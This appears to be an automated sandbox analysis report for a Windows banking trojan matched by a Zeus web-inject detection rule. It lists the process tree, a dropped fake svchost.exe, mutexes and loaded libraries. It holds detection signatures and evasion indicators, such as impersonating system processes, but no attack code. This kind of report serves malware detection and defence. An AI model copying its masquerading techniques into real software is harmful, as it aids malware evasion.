Source: 00000002.00000003.2785726916.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2787182616.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2758822752.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2809200397.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2757164455.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2775825052.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2168388667.0000000000881000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2776041284.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2790907170.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2794030784.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2774710797.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2170461210.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2792838901.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
The rule above matched in each of the following sources:
Source: 00000002.00000003.2773445866.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: 00000002.00000003.2791900704.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: 00000002.00000003.2789409871.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: 00000002.00000003.2784224437.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: 00000002.00000003.2790002799.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: 0000001B.00000002.2728043702.0000000003040000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: 00000006.00000002.2605946728.0000000001240000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: 0000000B.00000002.2639594297.0000000002EA0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: 00000002.00000003.2810131303.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: 00000009.00000002.2610520727.00000000009C0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: 00000027.00000002.2872659642.0000000000D30000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: 00000002.00000003.2707114238.0000000003C40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: 00000002.00000003.2678865886.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Process Memory Space: UMwpXhA46R.exe PID: 7020, type: MEMORYSTR
Source: Process Memory Space: svchost.exe PID: 1112, type: MEMORYSTR
Source: Process Memory Space: PMnAVsjMPucERAKEWNFImySCFHoLk.exe PID: 6912, type: MEMORYSTR
Source: Process Memory Space: PMnAVsjMPucERAKEWNFImySCFHoLk.exe PID: 1220, type: MEMORYSTR
Source: Process Memory Space: PMnAVsjMPucERAKEWNFImySCFHoLk.exe PID: 2268, type: MEMORYSTR
Source: Process Memory Space: PMnAVsjMPucERAKEWNFImySCFHoLk.exe PID: 3472, type: MEMORYSTR
Source: Process Memory Space: PMnAVsjMPucERAKEWNFImySCFHoLk.exe PID: 1492, type: MEMORYSTR
Source: Process Memory Space: PMnAVsjMPucERAKEWNFImySCFHoLk.exe PID: 6628, type: MEMORYSTR
Source: Process Memory Space: PMnAVsjMPucERAKEWNFImySCFHoLk.exe PID: 5128, type: MEMORYSTR
Source: Process Memory Space: PMnAVsjMPucERAKEWNFImySCFHoLk.exe PID: 2948, type: MEMORYSTR
Source: Process Memory Space: PMnAVsjMPucERAKEWNFImySCFHoLk.exe PID: 3416, type: MEMORYSTR
Source: Process Memory Space: PMnAVsjMPucERAKEWNFImySCFHoLk.exe PID: 3328, type: MEMORYSTR
Source: Process Memory Space: PMnAVsjMPucERAKEWNFImySCFHoLk.exe PID: 3896, type: MEMORYSTR
Source: Process Memory Space: PMnAVsjMPucERAKEWNFImySCFHoLk.exe PID: 6212, type: MEMORYSTR
Source: Process Memory Space: PMnAVsjMPucERAKEWNFImySCFHoLk.exe PID: 1476, type: MEMORYSTR
Source: UMwpXhA46R.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: svchost.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.bank.troj.spyw.expl.evad.winEXE@13/61@2294/28
Source: C:\Users\user\Desktop\UMwpXhA46R.exe Code function: 0_2_00401C70 Sleep,memset,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,GetLastError,SwitchToThread,CreateToolhelp32Snapshot,GetHandleInformation,CloseHandle,Module32First,StrStrIA,Module32Next,StrStrIA,StrStrIA,Module32Next,0_2_00401C70
Source: C:\Users\user\Desktop\UMwpXhA46R.exe Code function: 0_2_00402560 CoInitializeEx,GetModuleFileNameW,SysAllocString,SysAllocString,SysAllocString,CoCreateInstance,CoCreateInstance,CoCreateInstance,SysFreeString,SysFreeString,SysFreeString,CoUninitialize,0_2_00402560
Source: C:\Windows\apppatch\svchost.exe File created: C:\Program Files (x86)\Windows Defender\vonypom.com
Source: C:\Windows\apppatch\svchost.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\login[1].htm
Source: C:\Windows\apppatch\svchost.exe Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3472
Source: C:\Windows\apppatch\svchost.exe Mutant created: \Sessions\1\BaseNamedObjects\80F500EBa
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3416
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3328
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6628
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2948
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1220
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5128
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3896
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6912
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2268
Source: C:\Users\user\Desktop\UMwpXhA46R.exe File created: C:\Users\user\AppData\Local\Temp\6D41.tmp
Source: UMwpXhA46R.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\UMwpXhA46R.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: UMwpXhA46R.exe ReversingLabs: Detection: 81%
Source: UMwpXhA46R.exe String found in binary or memory: -help
Source: svchost.exe String found in binary or memory: -help
Source: C:\Users\user\Desktop\UMwpXhA46R.exe File read: C:\Users\user\Desktop\UMwpXhA46R.exe
Source: unknown Process created: C:\Users\user\Desktop\UMwpXhA46R.exe "C:\Users\user\Desktop\UMwpXhA46R.exe"
Source: C:\Users\user\Desktop\UMwpXhA46R.exe Process created: C:\Windows\apppatch\svchost.exe "C:\Windows\apppatch\svchost.exe"
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6912 -s 904
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1220 -s 884
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 980
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3472 -s 2076
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6628 -s 968
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5128 -s 1008
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2948 -s 832
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 1008
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3328 -s 1244
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3896 -s 908
Source: C:\Users\user\Desktop\UMwpXhA46R.exe Process created: C:\Windows\apppatch\svchost.exe "C:\Windows\apppatch\svchost.exe"
Source: C:\Users\user\Desktop\UMwpXhA46R.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\UMwpXhA46R.exe Section loaded: inetcomm.dll
Source: C:\Users\user\Desktop\UMwpXhA46R.exe Section loaded: msoert2.dll
Source: C:\Users\user\Desktop\UMwpXhA46R.exe Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\UMwpXhA46R.exe Section loaded: inetres.dll
Source: C:\Users\user\Desktop\UMwpXhA46R.exe Section loaded: vmhgfs.dll
Source: C:\Users\user\Desktop\UMwpXhA46R.exe Section loaded: netapi32.dll
Source: C:\Users\user\Desktop\UMwpXhA46R.exe Section loaded: samcli.dll
Source: C:\Users\user\Desktop\UMwpXhA46R.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\UMwpXhA46R.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\UMwpXhA46R.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\UMwpXhA46R.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\UMwpXhA46R.exe Section loaded: mpclient.dll
Source: C:\Users\user\Desktop\UMwpXhA46R.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\UMwpXhA46R.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\UMwpXhA46R.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\UMwpXhA46R.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\UMwpXhA46R.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\UMwpXhA46R.exe Section loaded: firewallapi.dll
Source: C:\Users\user\Desktop\UMwpXhA46R.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\UMwpXhA46R.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\UMwpXhA46R.exe Section loaded: fwbase.dll
Source: C:\Users\user\Desktop\UMwpXhA46R.exe Section loaded: fwpolicyiomgr.dll
Source: C:\Users\user\Desktop\UMwpXhA46R.exe Section loaded: ntmarta.dll
Source: C:\Windows\apppatch\svchost.exe Section loaded: apphelp.dll
Source: C:\Windows\apppatch\svchost.exe Section loaded: inetcomm.dll
Source: C:\Windows\apppatch\svchost.exe Section loaded: msoert2.dll
Source: C:\Windows\apppatch\svchost.exe Section loaded: oleacc.dll
Source: C:\Windows\apppatch\svchost.exe Section loaded: inetres.dll
Source: C:\Windows\apppatch\svchost.exe Section loaded: vmhgfs.dll
Source: C:\Windows\apppatch\svchost.exe Section loaded: netapi32.dll
Source: C:\Windows\apppatch\svchost.exe Section loaded: samcli.dll
Source: C:\Windows\apppatch\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\apppatch\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\apppatch\svchost.exe Section loaded: windows.storage.dll
Source: C:\Windows\apppatch\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\apppatch\svchost.exe Section loaded: mpclient.dll
Source: C:\Windows\apppatch\svchost.exe Section loaded: version.dll
Source: C:\Windows\apppatch\svchost.exe Section loaded: msasn1.dll
Source: C:\Windows\apppatch\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\apppatch\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\apppatch\svchost.exe Section loaded: uxtheme.dll
Source: C:\Windows\apppatch\svchost.exe Section loaded: firewallapi.dll
Source: C:\Windows\apppatch\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\apppatch\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\apppatch\svchost.exe Section loaded: fwbase.dll
Source: C:\Windows\apppatch\svchost.exe Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\apppatch\svchost.exe Section loaded: winscard.dll
Source: C:\Windows\apppatch\svchost.exe Section loaded: devobj.dll
Source: C:\Windows\apppatch\svchost.exe Section loaded: sensapi.dll
Source: C:\Windows\apppatch\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\apppatch\svchost.exe Section loaded: dbghelp.dll
Source: C:\Windows\apppatch\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\apppatch\svchost.exe Section loaded: wininet.dll
Source: C:\Windows\apppatch\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\apppatch\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\apppatch\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\apppatch\svchost.exe Section loaded: mswsock.dll
Source: C:\Windows\apppatch\svchost.exe Section loaded: winnsi.dll
Source: C:\Windows\apppatch\svchost.exe Section loaded: rasadhlp.dll
Source: C:\Windows\apppatch\svchost.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\apppatch\svchost.exe Section loaded: urlmon.dll
Source: C:\Windows\apppatch\svchost.exe Section loaded: srvcli.dll
Source: C:\Windows\apppatch\svchost.exe Section loaded: schannel.dll
Source: C:\Windows\apppatch\svchost.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\apppatch\svchost.exe Section loaded: ntasn1.dll
Source: C:\Windows\apppatch\svchost.exe Section loaded: msasn1.dll
Source: C:\Windows\apppatch\svchost.exe Section loaded: dpapi.dll
Source: C:\Windows\apppatch\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\apppatch\svchost.exe Section loaded: rsaenh.dll
Source: C:\Windows\apppatch\svchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\apppatch\svchost.exe Section loaded: gpapi.dll
Source: C:\Windows\apppatch\svchost.exe Section loaded: ncrypt.dll
Source: C:\Windows\apppatch\svchost.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\apppatch\svchost.exe Section loaded: napinsp.dll
Source: C:\Windows\apppatch\svchost.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\apppatch\svchost.exe Section loaded: wshbth.dll
Source: C:\Windows\apppatch\svchost.exe Section loaded: nlaapi.dll
Source: C:\Windows\apppatch\svchost.exe Section loaded: winrnr.dll
Source: C:\Windows\apppatch\svchost.exe Section loaded: winsta.dll
Source: C:\Windows\apppatch\svchost.exe Section loaded: symsrv.dll
Source: C:\Windows\apppatch\svchost.exe Section loaded: samlib.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe Section loaded: winscard.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe Section loaded: devobj.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe Section loaded: sensapi.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe Section loaded: dbghelp.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe Section loaded: netapi32.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe Section loaded: samcli.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe Section loaded: netutils.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe Section loaded: wininet.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe Section loaded: wldp.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe Section loaded: sspicli.dll
